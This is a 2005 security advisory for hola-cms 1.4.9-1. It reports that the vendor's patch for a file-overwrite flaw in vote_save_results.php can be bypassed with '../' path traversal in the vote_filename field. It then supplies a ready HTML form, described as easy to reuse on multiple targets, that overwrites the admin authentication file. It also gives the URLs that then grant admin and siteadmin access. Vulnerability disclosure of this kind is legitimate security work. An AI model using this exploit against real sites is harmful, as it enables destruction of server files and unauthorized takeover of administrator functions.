Virginity Security Advisory 2005-002
DATE : 2005-03-13 15:11 GMT TYPE : remote
VERSIONS AFFECTED : hola-cms-1.4.9-1 (http://holacms.drunkencat.net/) AUTHOR : Virginity ADVISORY NUMBER : 004
Like the one in SA-2005-001: A new patched version 1.4.9-1 got released where that issue was marked as solved. The Vote-Module(vote_save_results.php) now checks with strpos() wether the submitted "vote_filename" variable contains "holaDB/votes" at position 0.
BUT! Since we all know how to change directories by typing ../ we can still manipluate or destroy every file on the whole server by simply doing "vote_filename=holaDB/votes/../../[anything we want]"!!! Below the updated example how to destroy login-authentification file and gaining access to admin-functions!
Really sad that the quick patch (released 3? hours after notifcation) doesn't really work.
Author of the Software has been notified.
Create this html form (that makes it easier to use it on multiple targets):
<form action="http://[target]/[site-with-vote].php?vote=1" method="POST"> <input type="hidden" name="vote_filename" value="holaDB/votes/../../admin/multiuser/multiuser.php"> <input type="hidden" name="result" value="0"> <input type="submit" value="Stimme abgeben" name="button"> </form>
Of course you'll have to edit [target] and [site-with-vote] to match your site! Now when you push the button the first lines of the multiuser.php (which includes the authentication mechanism) get overwritten and by calling http://[target]/admin/index_cms.php you have access to all user functions. by calling http://[target]/admin/[module you want].php?username=siteadmin to all siteadmin functions!
Use other CMS... i think PHP-Nuke isn't that vulnerable ;)
YES! The girl did it again :) Contact me on IRC!